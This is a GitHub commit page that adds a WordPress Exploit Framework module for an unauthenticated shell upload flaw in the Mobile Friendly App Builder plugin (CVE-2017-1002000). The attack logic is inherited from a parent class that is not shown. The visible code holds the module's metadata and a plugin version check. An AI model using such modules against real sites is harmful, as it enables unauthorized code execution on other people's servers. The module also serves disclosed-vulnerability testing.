Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit 8a9c4f6

Browse files
committed
Add Mobile Friendly App Builder shell upload
1 parent 2bd250b commit 8a9c4f6

File tree

1 file changed

+27
-0
lines changed

1 file changed

+27
-0
lines changed
Lines changed: 27 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,27 @@
1+
class Wpxf::Exploit::MobileFriendlyAppBuilderShellUpload < Wpxf::Exploit::MobileAppNativeV3ShellUpload
2+
def initialize
3+
super
4+
5+
update_info(
6+
name: 'Mobile Friendly App Builder <= 3.0 Unauthenticated Shell Upload',
7+
author: [
8+
'Larry W. Cashdollar', # Discovery and disclosure
9+
'Rob Carr <rob[at]rastating.com>' # WPXF module
10+
],
11+
references: [
12+
['WPVDB', '8771'],
13+
['CVE', '2017-1002000'],
14+
['URL', 'http://www.vapidlabs.com/advisory.php?v=179']
15+
],
16+
date: 'Mar 01 2017'
17+
)
18+
end
19+
20+
def check
21+
check_plugin_version_from_readme(plugin_name)
22+
end
23+
24+
def plugin_name
25+
'mobile-friendly-app-builder-by-easytouch'
26+
end
27+
end

0 commit comments

Comments
 (0)